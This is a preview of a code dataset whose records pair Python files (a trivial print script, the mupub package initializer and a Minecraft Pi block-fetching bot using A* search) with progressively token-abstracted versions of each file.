Dataset schema:

| column  | type     | values           |
|---------|----------|------------------|
| index   | int64    | 0 – 100k         |
| blob_id | string   | length 40        |
| code    | string   | length 7 – 7.27M |
| steps   | sequence | length 1 – 1.25k |
| error   | bool     | 2 classes        |
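Each record pairs a Python source file (`code`, keyed by a 40-character hex `blob_id`) with a sequence of progressively more abstract rewrites of that file (`steps`) and a boolean `error` flag. A minimal sketch of loading and inspecting a record with the `datasets` library, assuming the data is published on the Hugging Face Hub; the repository id below is a placeholder, since the preview does not show the real name:

```python
# Sketch only: "user/python-abstraction-steps" is an invented repository id.
from datasets import load_dataset

ds = load_dataset("user/python-abstraction-steps", split="train")

row = ds[0]
print(row["index"])       # int64, 0 - 100k in this preview
print(row["blob_id"])     # 40-character identifier
print(row["code"][:80])   # original source (7 B to 7.27 MB across the split)
print(len(row["steps"]))  # 1 to 1.25k abstraction stages per record
print(row["error"])       # bool flag; false for the rows shown here
```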
Row 0
index: 0
blob_id: aff1a9263e183610f403a4d6a7f27b45eacb7ff2
code:

```python
name='valentina '
print(name*1000)
```

steps:
[ "name='valentina '\nprint(name*1000)\n", "name = 'valentina '\nprint(name * 1000)\n", "<assignment token>\nprint(name * 1000)\n", "<assignment token>\n<code token>\n" ]
error: false
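All rows visible in this preview carry `error: false`. If the flag records whether the original source fails when executed (an assumption; the preview does not define it), a row-0-style label could be re-derived with a sandboxed run:

```python
# Hedged sketch: re-derive an error-style flag for row 0 by executing its
# `code` field in a subprocess. Treating "nonzero exit" as the error
# condition is an assumption about what the dataset's `error` column means.
import subprocess
import sys

code = "name='valentina '\nprint(name*1000)\n"  # row 0's `code` field

proc = subprocess.run([sys.executable, "-c", code],
                      capture_output=True, timeout=10)
print(proc.returncode != 0)  # False, matching row 0's `error` value
```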
Row 1
index: 1
blob_id: eabf06481509962652812af67ad59da5cfe30fae
code:

```python
""" mupub module.
"""

__all__ = (
    '__title__', '__summary__', '__version__',
    '__author__', '__license__', '__copyright__',
)


__title__ = 'mupub'
__summary__ = 'Musical score publishing utility for the Mutopia Project'

"""Versioning:
This utility follows a MAJOR . MINOR . EDIT format. Upon a major
release, the MAJOR number is incremented and the MINOR is zeroed.
During development of an upcoming release, the MINOR number may be
incremented.

"""
__version__ = '1.0.8'

__author__ = 'Glen Larsen, Chris Sawer'
__author_email__= '[email protected]'
__uri__ = 'http://mutopiaproject.org/'

__license__ = 'MIT'
__copyright__ = 'Copyright 2018 The Mutopia Project'

from .assets import collect_assets
from .commands.build import build
from .commands.check import check
from .commands.init import init
from .commands.tag import tag
from .commands.clean import clean
from .config import CONFIG_DICT, CONFIG_DIR, getDBPath
from .config import test_config, saveConfig
from .core import MUTOPIA_BASE, FTP_BASE, URL_BASE
from .core import id_from_footer
from .exceptions import BadConfiguration, IncompleteBuild, TagProcessException
from .header import Loader, LYLoader, VersionLoader
from .header import RawLoader, Header, REQUIRED_FIELDS
from .header import find_header
from .lily import LyLocator, LyVersion
from .validate import Validator, DBValidator, in_repository
from .tagedit import tag_header, tag_file
from .rdfu import NS, MuRDF
from .utils import resolve_input,resolve_lysfile
```

steps:
[ "\"\"\" mupub module.\n\"\"\"\n\n__all__ = (\n '__title__', '__summary__', '__version__',\n '__author__', '__license__', '__copyright__',\n)\n\n\n__title__ = 'mupub'\n__summary__ = 'Musical score publishing utility for the Mutopia Project'\n\n\"\"\"Versioning:\nThis utility follows a MAJOR . MINOR . EDIT format. Upon a major\nrelease, the MAJOR number is incremented and the MINOR is zeroed.\nDuring development of an upcoming release, the MINOR number may be\nincremented.\n\n\"\"\"\n__version__ = '1.0.8'\n\n__author__ = 'Glen Larsen, Chris Sawer'\n__author_email__= '[email protected]'\n__uri__ = 'http://mutopiaproject.org/'\n\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2018 The Mutopia Project'\n\nfrom .assets import collect_assets\nfrom .commands.build import build\nfrom .commands.check import check\nfrom .commands.init import init\nfrom .commands.tag import tag\nfrom .commands.clean import clean\nfrom .config import CONFIG_DICT, CONFIG_DIR, getDBPath\nfrom .config import test_config, saveConfig\nfrom .core import MUTOPIA_BASE, FTP_BASE, URL_BASE\nfrom .core import id_from_footer\nfrom .exceptions import BadConfiguration, IncompleteBuild, TagProcessException\nfrom .header import Loader, LYLoader, VersionLoader\nfrom .header import RawLoader, Header, REQUIRED_FIELDS\nfrom .header import find_header\nfrom .lily import LyLocator, LyVersion\nfrom .validate import Validator, DBValidator, in_repository\nfrom .tagedit import tag_header, tag_file\nfrom .rdfu import NS, MuRDF\nfrom .utils import resolve_input,resolve_lysfile\n", "<docstring token>\n__all__ = ('__title__', '__summary__', '__version__', '__author__',\n '__license__', '__copyright__')\n__title__ = 'mupub'\n__summary__ = 'Musical score publishing utility for the Mutopia Project'\n<docstring token>\n__version__ = '1.0.8'\n__author__ = 'Glen Larsen, Chris Sawer'\n__author_email__ = '[email protected]'\n__uri__ = 'http://mutopiaproject.org/'\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2018 The Mutopia Project'\nfrom .assets import collect_assets\nfrom .commands.build import build\nfrom .commands.check import check\nfrom .commands.init import init\nfrom .commands.tag import tag\nfrom .commands.clean import clean\nfrom .config import CONFIG_DICT, CONFIG_DIR, getDBPath\nfrom .config import test_config, saveConfig\nfrom .core import MUTOPIA_BASE, FTP_BASE, URL_BASE\nfrom .core import id_from_footer\nfrom .exceptions import BadConfiguration, IncompleteBuild, TagProcessException\nfrom .header import Loader, LYLoader, VersionLoader\nfrom .header import RawLoader, Header, REQUIRED_FIELDS\nfrom .header import find_header\nfrom .lily import LyLocator, LyVersion\nfrom .validate import Validator, DBValidator, in_repository\nfrom .tagedit import tag_header, tag_file\nfrom .rdfu import NS, MuRDF\nfrom .utils import resolve_input, resolve_lysfile\n", "<docstring token>\n__all__ = ('__title__', '__summary__', '__version__', '__author__',\n '__license__', '__copyright__')\n__title__ = 'mupub'\n__summary__ = 'Musical score publishing utility for the Mutopia Project'\n<docstring token>\n__version__ = '1.0.8'\n__author__ = 'Glen Larsen, Chris Sawer'\n__author_email__ = '[email protected]'\n__uri__ = 'http://mutopiaproject.org/'\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2018 The Mutopia Project'\n<import token>\n", "<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<import token>\n" ]
error: false
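Row 1 makes the staging in `steps` easier to read than row 0: the literal source comes first, then a version with docstrings collapsed to `<docstring token>`, then one with the import block collapsed to `<import token>`, and finally one with the remaining assignments reduced to `<assignment token>`. A toy approximation of the docstring stage using the standard `ast` module is sketched below; the dataset's actual pipeline is not shown here, so treat this as a guess at the technique rather than its implementation.

```python
# Toy sketch of one abstraction stage: collapse every docstring to a
# placeholder. ast.unparse (Python 3.9+) re-quotes the placeholder, so the
# output differs cosmetically from the dataset's bare `<docstring token>`.
import ast

def mask_docstrings(source: str) -> str:
    tree = ast.parse(source)
    for node in ast.walk(tree):  # ast.walk yields the Module node too
        if not isinstance(node, (ast.Module, ast.ClassDef,
                                 ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        body = node.body
        if (body and isinstance(body[0], ast.Expr)
                and isinstance(body[0].value, ast.Constant)
                and isinstance(body[0].value.value, str)):
            body[0] = ast.Expr(value=ast.Constant("<docstring token>"))
    return ast.unparse(tree)

print(mask_docstrings('""" mupub module.\n"""\n__title__ = \'mupub\'\n'))
```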
Row 2
index: 2
blob_id: 54f0ed5f705d5ada28721301f297b2b0058773ad
code:
"""Module for the bot""" from copy import deepcopy from time import sleep import mcpi.minecraft as minecraft from mcpi.vec3 import Vec3 import mcpi.block as block from search import SearchProblem, astar, bfs from singleton import singleton _AIR = block.AIR.id _WATER = block.WATER.id _LAVA = block.LAVA.id _BEDROCK = block.BEDROCK.id _DROP = 2 # It can drop at most this many _DROP_PLUS_1 = _DROP + 1 _DELAY = 1 class _Vec3(Vec3): """A Vec3 that is hashable. Everything in this program should use this class.""" def __hash__(self): """Return the hash.""" return hash((self.x, self.y, self.z)) def clone(self): """Return a clone.""" return _Vec3(self.x, self.y, self.z) class _GenericBot: """A generic bot.""" def __init__(self, pos, inventory=None): """Initialize with an empty inventory. inventory is a dictionary. If None, an empty one will be used.""" if inventory is None: self._inventory = {} else: self._inventory = deepcopy(inventory) self._pos = deepcopy(pos) def take_action(self, action): """Take the action (acquired from _get_legal_actions).""" getattr(self, action['func'])( *action.get('args', ()), **action.get('kwargs', {}) ) def take_actions(self, actions, seconds=None): """Take these actions. If seconds is not None, sleep 'seconds' seconds. """ if not actions: return self.take_action(actions[0]) for action in actions[1:]: if seconds is not None: sleep(seconds) self.take_action(action) def get_pos(self): """Return the position.""" return deepcopy(self._pos) def get_legal_actions(self, block_=None): """Return a list of legal actions. If block_ is None, return all legal actions. Otherwise, return all legal actions that don't involve placing the block.""" return self._get_move_actions(block_) + self._get_mine_actions() + \ self._get_placement_actions(block_) def contains(self, block_): """Return whether or not the bot contains the block id.""" return block_ in self._inventory def _get_block(self, pos): """Get the block at the position.""" raise NotImplementedError def _place(self, loc, exclude=None, block_=None): """Place a block from the inventory only. If exclude is not None, place a block that is not 'exclude'. If block is not None, place that block only. """ if not self._inventory: raise Exception('Inventory empty') if block_ is None: for key in self._inventory: if key != exclude: block_ = key break else: raise Exception(( 'You requested not to place %s, but it is the only ' 'block in the inventory.' % exclude )) if block_ not in self._inventory: raise Exception('Block %s is not in the inventory' % block_) if self._inventory[block_] == 1: del self._inventory[block_] else: self._inventory[block_] -= 1 self._set_block(loc, block_) def _move_down(self): """Move and mine the block below.""" new_pos = self._pos + _Vec3(0, -1, 0) block_ = self._get_block(new_pos) if block_ != _WATER: self._add_to_inv(block_) self._move(new_pos) def _add_to_inv(self, block_): """Add the block to the inventory.""" if block_ in self._inventory: self._inventory[block_] += 1 else: self._inventory[block_] = 1 def _move_up(self, exclude=None): """Move and place a block below. If exclude is not None, place a block that is not 'exclude'. """ self._move(self._pos + _Vec3(0, 1, 0)) self._place(self._pos + _Vec3(0, -1, 0), exclude) def _mine(self, loc): """Mine the block.""" block_ = self._get_block(loc) self._add_to_inv(block_) self._set_block(loc, _AIR) def _get_move_actions(self, exclude=None): """Return a list of legal movement actions. exclude is the block to exclude. 
""" rtn = [] # Check for moving up can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR, _WATER} if can_move_up: if self._surrounded(): rtn.append({ 'func': '_move', 'args': (self._pos + _Vec3(0, 1, 0),) }) else: rtn.append({ 'func': '_move_up', 'args': (exclude,) }) # Check for moving down hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0)) if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}: rtn.append({'func': '_move_down'}) # Check for side moves for dir_ in _adj_dirs(): rtn.extend(self._side_moves(dir_, can_move_up)) return rtn def _side_moves(self, dir_, can_move_up): """Return the list of side moves. dir_ is an adjacent direction. can_move_up is a boolean for whether or not the bot can move up. """ rtn = [] base_pos = self._pos + dir_ base_block = self._get_block(base_pos) empty_blocks = {_AIR, _WATER} # Check if it can move up if can_move_up and base_block not in {_AIR, _LAVA, _WATER}: for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]: if self._get_block(base_pos + vert_dir) not in empty_blocks: break else: rtn.append({ 'func': '_move', 'args': (base_pos + _Vec3(0, 1, 0),) }) # Check if it can move in that direction for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]: if self._get_block(base_pos + vert_dir) not in empty_blocks: break # Fall else: pos = base_pos + _Vec3(0, -1, 0) for _ in xrange(_DROP_PLUS_1): block_ = self._get_block(pos) if block_ != _AIR: if block_ != _LAVA: rtn.append({ 'func': '_move', 'args': (pos + _Vec3(0, 1, 0),) }) break pos.y -= 1 def _surrounded(self): """Return whether or not the bot is surrounded by water.""" for dir_ in _adj_dirs(): if self._get_block(self._pos + dir_) != _WATER: return False return True def _get_mine_actions(self): """Return a list of legal mining actions (that only involve mining and not moving).""" rtn = [] dont_mine = {_AIR, _WATER, _LAVA} # Mine above. pos_above = self._pos + _Vec3(0, 2, 0) if self._get_block(pos_above) not in dont_mine: rtn.append({ 'func': '_mine', 'args': (pos_above,) }) for dir_ in _adj_dirs(): pos = self._pos + dir_ for _ in xrange(2): if self._get_block(pos) not in dont_mine: rtn.append({ 'func': '_mine', 'args': (pos,) }) pos = pos + _Vec3(0, 1, 0) return rtn def _get_placement_actions(self, exclude=None): """Return a list of legal actions that only involve placing a block from the inventory. exclude is a block id. It is the block that should not be placed. If None, any block can be placed.""" if not self._has_blocks_to_place(exclude=exclude): return [] dirs = [_Vec3(0, 2, 0)] for dir_ in _adj_dirs(): dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)]) if self._get_block(self._pos + dir_) in [_AIR, _WATER]: dirs.append(dir_ + _Vec3(0, -1, 0)) rtn = [] for dir_ in dirs: pos = self._pos + dir_ if self._can_place(pos): rtn.append({ 'func': '_place', 'args': (pos,), 'kwargs': {'exclude': exclude} }) return rtn def _can_place(self, loc): """Return whether or not the bot can place a block at that location independent of what it has in its inventory.""" non_blocks = [_AIR, _WATER, _LAVA] player = [self._pos, self._pos + _Vec3(0, 1, 0)] for dir_ in _adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]: new_loc = loc + dir_ if new_loc not in player and self._get_block(new_loc) \ not in non_blocks: return True return False def _has_blocks_to_place(self, exclude=None): """Return whether or not the bot can place a block from the inventory. If exclude is None, any block can be placed.""" for block_ in self._inventory: if block_ != exclude: return True return False def _set_block(self, pos, block_): """Set a block. 
block_ is the block id.""" raise NotImplementedError def _move(self, pos): """Move there only.""" self._pos = deepcopy(pos) class _ImaginaryBot(_GenericBot): """A bot used for finding paths that doesn't actually change blocks in the world.""" def __init__(self, pos, inventory=None): """Create a new bot.""" _GenericBot.__init__(self, pos, inventory) self._changes = {} # Changes to the world def _set_block(self, pos, block_): """Set a block. block_ is the block id.""" self._changes[deepcopy(pos)] = block def _get_block(self, pos): """Get the block at the position.""" if pos in self._changes: return self._changes[pos] else: return _get_mc().getBlock(pos) def get_block(self, pos): """The public version.""" return self._get_block(pos) def __hash__(self): """Return the hash.""" return hash(frozenset([self._pos] + \ _key_vals(self._inventory) + \ _key_vals(self._changes) )) class Bot(_GenericBot): """The real bot. All vector arguments are Vec3s.""" _BOT_BLOCK = block.IRON_BLOCK.id def __init__(self): """Create a bot next to the player.""" pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0) pos = _Vec3(pos.x, pos.y, pos.z) _GenericBot.__init__(self, pos) self._pos = pos self._move(self._pos) @staticmethod def destroy_all(): """Destroy all bots within a small distance (in case I forget to destroy one).""" player_loc = _player_loc() minec = _get_mc() rad = 10 for x in xrange(player_loc.x - rad, player_loc.x + rad): for y in xrange(player_loc.y - rad, player_loc.y + rad): for z in xrange(player_loc.z - rad, player_loc.z + rad): if minec.getBlock(x, y, z) == Bot._BOT_BLOCK: minec.setBlock(x, y, z, _AIR) def destroy(self): """Set itself to air.""" self._set_block(self._pos, _AIR) self._set_block(self._pos + _Vec3(0, 1, 0), _AIR) def fetch(self, block_name): """Mine and return a block to the player.""" imag_bot = _ImaginaryBot(self._pos, self._inventory) block_id = getattr(block, block_name).id block_loc = self._get_block_loc(block_id) mine_prob = _MineProblem(imag_bot, block_loc, block_id) mine_actions = astar(mine_prob, _mine_heuristic) self.take_actions(mine_actions, _DELAY) imag_bot = _ImaginaryBot(self._pos, self._inventory) player_loc = _player_loc() return_prob = _ReturnProblem(imag_bot, block_id, player_loc) return_actions = astar(return_prob, _return_heuristic) imag_bot.take_actions(return_actions) return_actions.append({ 'func': '_place', 'args': (imag_bot.get_pos() + player_loc) / 2, 'kwargs': {'block': block_id} }) self.take_actions(return_actions, _DELAY) def _get_block_loc(self, block_id): """Return the location of the block.""" find_prob = FindProblem(self._pos, block_id) dirs = bfs(find_prob) return self._pos + sum(dirs) def _set_block(self, pos, block_): """Place an actual block in the world. block is a block id.""" _get_mc().setBlock(pos, block_) def _get_block(self, pos): """Get the block at the position.""" return _get_mc().getBlock(pos) def _move(self, pos): """Move there, and set the appropriate blocks.""" self._set_block(self._pos, _AIR) self._set_block(self._pos + _Vec3(0, 1, 0), _AIR) self._set_block(pos, self._BOT_BLOCK) self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK) self._pos = pos class FindProblem(SearchProblem): """Problem for finding the location of a block in the world. A state in this problem is a location. 
""" def __init__(self, start_loc, block_id): """Initialize.""" self._start_loc = deepcopy(start_loc) self._block_id = block_id def getStartState(self): """Return the starting location.""" return self._start_loc def isGoalState(self, state): return _get_mc().getBlock(state) == self._block_id def getSuccessors(self, state): """Return the successors.""" rtn = [] for dir_ in _all_dirs(): successor = state + dir_ if successor.y <= _get_mc().getHeight(successor.x, successor.z) \ and _get_mc().getBlock(successor) != _BEDROCK: rtn.append((successor, dir_, 1)) return rtn class _MineProblem(SearchProblem): """The problem of finding the block and mining it (not returning it).""" def __init__(self, imag_bot, block_loc, block_id): """Initialize the problem with an _ImaginaryBot. block_loc is a Vec3. """ self._bot = imag_bot self._block_loc = deepcopy(block_loc) self._block_id = block_id def get_block_loc(self): """Return the block location.""" return deepcopy(self._block_loc) def get_block_id(self): """Return the block it's trying to mine.""" return self._block_id def getStartState(self): """Return the bot passed in.""" return self._bot def isGoalState(self, state): """Return whether or not the bot has the block.""" return state.contains(self._block_id) def getSuccessors(self, state): """Return the successors.""" rtn = [] for action in state.get_legal_actions(): successor = deepcopy(state) successor.take_action(action) rtn.append((successor, action, 1)) return rtn class _ReturnProblem(SearchProblem): """The problem of returning to the player. This does not place the block next to the player.""" def __init__(self, imag_bot, block_, player_loc): """Initialized the problem with an _ImaginaryBot. block is a block id.""" self._bot = imag_bot self._block = block_ self._player_loc = player_loc def get_player_loc(self): """Return the player location.""" return deepcopy(self._player_loc) def getStartState(self): """Return the bot passed in.""" return self._bot def isGoalState(self, state): """Return whether or not the bot is next to the player.""" diff = state.get_pos() - self._player_loc return diff.y == 0 and (diff.x == 0 or diff.z == 0) and \ abs(diff.x) + abs(diff.z) == 2 and \ state.get_block(self._player_loc + diff/2 + _Vec3(0, -1, 0)) not in \ (_AIR, _LAVA, _WATER) def getSuccessors(self, state): """Return the successors.""" rtn = [] for action in state.get_legal_actions(self._block): successor = deepcopy(state) successor.take_action(action) rtn.append((successor, action, 1)) return rtn def _mine_heuristic(bot, problem): """Return the mining heuristic. bot is an _ImaginaryBot. """ if bot.contains(problem.get_block_id()): return 0 bot_pos = bot.get_pos() dest_pos = problem.get_block_loc() # If man == dy: return man + 1 # If man > dy: return man # If man < dy: return dy? man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z)) y_diff = bot_pos.y - dest_pos.y if y_diff < 0: y_diff += 1 if y_diff == 0: return man_dist # Transform so that it's only dropping drop = _DROP if y_diff > 0 else 1 y_diff = abs(y_diff) drops = _drops(y_diff, drop) if man_dist > drops: return man_dist if man_dist == drops: return man_dist + 1 if drop == 1: return drops if y_diff % drop == 1: return drops return drops + 1 def _drops(dist, drop): """Return the number of times it takes to drop a distance dist. drop is the length of one drop. Both are assumed positive.""" rtn = dist / drop if dist % drop != 0: rtn += 1 return rtn def _return_heuristic(bot, problem): """Return the return heuristic. bot is an _ImaginaryBot. 
""" bot_pos = bot.get_pos() player_pos = problem.get_player_loc() bot_plane_pos = (bot.x, bot.z) y_diff = bot_pos.y - player_pos.y drop = _DROP if y_diff > 0 else 1 y_diff = abs(y_diff) drops = _drops(y_diff, drop) min_man = float('inf') for dir_ in _adj_dirs(): loc = player_pos + 2 * dir_ man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z)) if man_dist < min_man: min_man = man_dist if man_dist < drops: return drops return min_man def _to_my_vec3(vec): """Return the _Vec3 alternative of the Vec3.""" return _Vec3(vec.x, vec.y, vec.z) def _player_loc(): """Return the player's location.""" return _to_my_vec3(_get_mc().player.getTilePos()) def _adj_dirs(): """Return the adjacent directions.""" return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)] def _all_dirs(): """Return all adjacent directions.""" return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)] def _manhattan(pos1, pos2): """Return the manhattan distance. pos1 and pos2 should be iterable.""" return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2)) @singleton def _get_mc(): """Return the Minecraft instance.""" return minecraft.Minecraft.create() def _key_vals(dict_): """Return a list of key-val tuples.""" return [(key, val) for key, val in dict_.iteritems()]
[ "\"\"\"Module for the bot\"\"\"\n\nfrom copy import deepcopy\nfrom time import sleep\n\nimport mcpi.minecraft as minecraft\nfrom mcpi.vec3 import Vec3\nimport mcpi.block as block\n\nfrom search import SearchProblem, astar, bfs\nfrom singleton import singleton\n\n_AIR = block.AIR.id\n_WATER = block.WATER.id\n_LAVA = block.LAVA.id\n_BEDROCK = block.BEDROCK.id\n\n_DROP = 2 # It can drop at most this many\n_DROP_PLUS_1 = _DROP + 1\n_DELAY = 1\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(\n *action.get('args', ()), \n **action.get('kwargs', {})\n )\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions() + \\\n self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception((\n 'You requested not to place %s, but it is the only '\n 'block in the inventory.' 
% exclude\n ))\n\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n\n self._set_block(loc, block_)\n \n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n \n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n\n # Check for moving up\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR, _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({\n 'func': '_move',\n 'args': (self._pos + _Vec3(0, 1, 0),)\n })\n else:\n rtn.append({\n 'func': '_move_up',\n 'args': (exclude,)\n })\n\n # Check for moving down\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n\n # Check for side moves \n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n\n # Check if it can move up\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({\n 'func': '_move',\n 'args': (base_pos + _Vec3(0, 1, 0),)\n })\n\n # Check if it can move in that direction\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n\n # Fall\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({\n 'func': '_move',\n 'args': (pos + _Vec3(0, 1, 0),)\n })\n break\n pos.y -= 1 \n \n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n # Mine above.\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({\n 'func': '_mine',\n 'args': (pos_above,)\n })\n\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({\n 'func': '_mine',\n 'args': 
(pos,)\n })\n pos = pos + _Vec3(0, 1, 0)\n\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({\n 'func': '_place',\n 'args': (pos,),\n 'kwargs': {'exclude': exclude}\n })\n\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in _adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]:\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc) \\\n not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {} # Changes to the world\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + \\\n _key_vals(self._inventory) + \\\n _key_vals(self._changes)\n ))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + 